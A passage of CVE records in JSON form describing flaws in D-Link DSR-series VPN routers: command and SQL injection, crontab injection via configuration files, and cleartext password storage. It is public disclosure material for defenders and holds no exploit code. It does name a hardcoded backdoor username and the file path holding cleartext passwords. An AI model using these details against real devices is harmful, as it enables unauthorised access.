"refsource": "MISC",
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195",
"refsource": "MISC",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"name": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/",
"refsource": "MISC",
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-25757",
"datePublished": "2020-12-15T19:27:32",
"dateReserved": "2020-09-18T00:00:00",
"dateUpdated": "2024-08-04T15:40:36.937Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-18568 (GCVE-0-2020-18568)
Vulnerability from cvelistv5
Published
2021-02-02 13:22
Modified
2024-08-04 14:00
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.dlink.com/en/security-bulletin/ | x_refsource_MISC | |
| https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T14:00:49.387Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-02T13:22:19",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2020-18568",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.dlink.com/en/security-bulletin/",
"refsource": "MISC",
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"name": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a",
"refsource": "MISC",
"url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-18568",
"datePublished": "2021-02-02T13:22:19",
"dateReserved": "2020-08-13T00:00:00",
"dateUpdated": "2024-08-04T14:00:49.387Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5945 (GCVE-0-2013-5945)
Vulnerability from cvelistv5
Published
2020-02-11 01:54
Modified
2024-08-06 17:29
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:29:42.358Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-10-28T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-11T01:54:15",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5945",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
"refsource": "MISC",
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
"refsource": "MISC",
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
"refsource": "MISC",
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
"refsource": "MISC",
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"name": "http://www.exploit-db.com/exploits/30061",
"refsource": "MISC",
"url": "http://www.exploit-db.com/exploits/30061"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5945",
"datePublished": "2020-02-11T01:54:15",
"dateReserved": "2013-09-27T00:00:00",
"dateUpdated": "2024-08-06T17:29:42.358Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-25758 (GCVE-0-2020-25758)
Vulnerability from cvelistv5
Published
2020-12-15 19:27
Modified
2024-08-04 15:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.dlink.com/en/security-bulletin | x_refsource_MISC | |
| https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195 | x_refsource_MISC | |
| https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T15:40:36.946Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-12-15T19:27:55",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2020-25758",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.dlink.com/en/security-bulletin",
"refsource": "MISC",
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195",
"refsource": "MISC",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"name": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/",
"refsource": "MISC",
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-25758",
"datePublished": "2020-12-15T19:27:55",
"dateReserved": "2020-09-18T00:00:00",
"dateUpdated": "2024-08-04T15:40:36.946Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-7004 (GCVE-0-2013-7004)
Vulnerability from cvelistv5
Published
2013-12-19 02:00
Modified
2024-08-06 17:53
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
References
| ▼ | URL | Tags |
|---|---|---|
| http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf | x_refsource_MISC | |
| http://www.exploit-db.com/exploits/30061 | exploit, x_refsource_EXPLOIT-DB | |
| http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf | x_refsource_MISC | |
| http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf | x_refsource_MISC | |
| http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:46.023Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"name": "30061",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-12-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-19T01:57:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"name": "30061",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7004",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
"refsource": "MISC",
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"name": "30061",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
"refsource": "MISC",
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
"refsource": "MISC",
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
"refsource": "MISC",
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7004",
"datePublished": "2013-12-19T02:00:00",
"dateReserved": "2013-12-07T00:00:00",
"dateUpdated": "2024-08-06T17:53:46.023Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5946 (GCVE-0-2013-5946)
Vulnerability from cvelistv5
Published
2013-12-19 02:00
Modified
2024-08-06 17:29
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section.
References
| ▼ | URL | Tags |
|---|---|---|
| http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf | x_refsource_CONFIRM | |
| http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf | x_refsource_CONFIRM | |
| http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf | x_refsource_CONFIRM | |
| http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf | x_refsource_CONFIRM | |
| http://www.exploit-db.com/exploits/30061 | exploit, x_refsource_EXPLOIT-DB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:29:42.605Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"name": "30061",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-10-28T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-19T01:57:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"name": "30061",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5946",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
"refsource": "CONFIRM",
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
"refsource": "CONFIRM",
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
"refsource": "CONFIRM",
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
"refsource": "CONFIRM",
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"name": "30061",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/30061"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5946",
"datePublished": "2013-12-19T02:00:00",
"dateReserved": "2013-09-27T00:00:00",
"dateUpdated": "2024-08-06T17:29:42.605Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-7005 (GCVE-0-2013-7005)
Vulnerability from cvelistv5
Published
2013-12-19 02:00
Modified
2024-08-06 17:53
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#]["Password"] fields in /tmp/teamf1.cfg.ascii.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.exploit-db.com/exploits/30061 | exploit, x_refsource_EXPLOIT-DB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:46.062Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "30061",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-12-06T00:00:00",
"descriptions": [
{
"lang": "en",
